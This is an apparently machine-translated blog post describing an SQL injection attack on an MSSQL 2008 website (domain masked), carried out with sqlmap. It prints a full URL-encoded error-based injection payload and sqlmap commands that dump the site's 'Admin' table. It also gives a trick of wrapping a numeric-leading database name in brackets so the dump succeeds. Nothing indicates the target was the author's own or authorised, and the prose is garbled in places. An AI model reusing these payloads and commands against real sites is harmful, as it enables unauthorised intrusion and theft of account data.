Sqlmap Injection Detection Experience 0x01

One day encounter a sqlinjection Point,mssql 2008, has turned on the error mode.
Immediately throw into the Sqlmap run, all the way smoothly, unexpectedly or SA's authority, thought luck really good, anyhow all get fixed.
databases, tables, columns are listed, but the –dump parameters are dead or alive.
Error "Unable to retrieve the number of entries for table ' Admin ' in database ' 2012_xxxx '"--x is Mosaic ha:)
Thought should be easy to fix, then find the manual injection method, test without fruit.
or back to sqlmap,-h. View Help, found that the-v parameter can specify the output verbosity, open to-V 3, found to show the payload, pound, directly open to-V 5, found to provide the entire HTTP request, no wonder the error, the original is returned 500, Using Firefox to open the full payload is a syntax error.

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20and%204416%3dconvert%28int%2c%28select%20char%28113%29%2bchar %28115%29%2bchar%28119%29%2bchar%28100%29%2bchar%28113%29%2b%28select%20isnull%28cast%28count%28*%29%20as% 20nvarchar%284000%29%29%2cchar%2832%29%29%20from%20%222012_xxxx%22..syscolumns%2c2012_xxxx. Sysobjects%20where%202012_xxxx. Syscolumns.id%3d2012_xxxx. Sysobjects.id%20and%202012_xxxx. sysobjects.name%3dchar%2884%29%2bchar%2866%29%2bchar%2895%29%2bchar%2865%29%2bchar%28100%29%2bchar%28109%29% 2bchar%28105%29%2bchar%28110%29%29%2bchar%28113%29%2bchar%28107%29%2bchar%28122%29%2bchar%28104%29%2bchar% 28113%29%29%29

is obviously a 2012 problem, that is, the wrong number in the library name as a parameter

In the URL of the library name plus double quotes wrapped, sure enough to burst the data.

Problem again, want me to explode data manually I can not, or to return to Sqlmap Ah, means to find a way to wrap up the name of the library, not let the system to parse it into a parameter

XTEST1:./sqlmap.py-u http://www.xxxx.cn/xxxx/detail.aspx?id=218–dump-d "' 2012_xxxx"-t ' Admin '

This time better, or error Unable to retrieve column names for table ' Admin ' in database ' "2012_xxxx", meaning that there is a return, but the library name is not correct.

XTEST12./sqlmap.py-u http://www.xxxx.cn/broadband/detail.aspx?id=218–dump-d "[2012_xxxx]"-t ' Admin '

I do not remember where the brainwave, the use of brackets wrapped, sure enough to succeed, dump out the entire table.

xconclusion: You can use the-v parameter to specify the output verbosity when using Sqlmap, and then view the payload directly in the browser, identifying the syntax error point and trying to improve it. In the case of a system miscalculation, the name of the library name is available in brackets.

Sqlmap Injection Detection Experience 0x01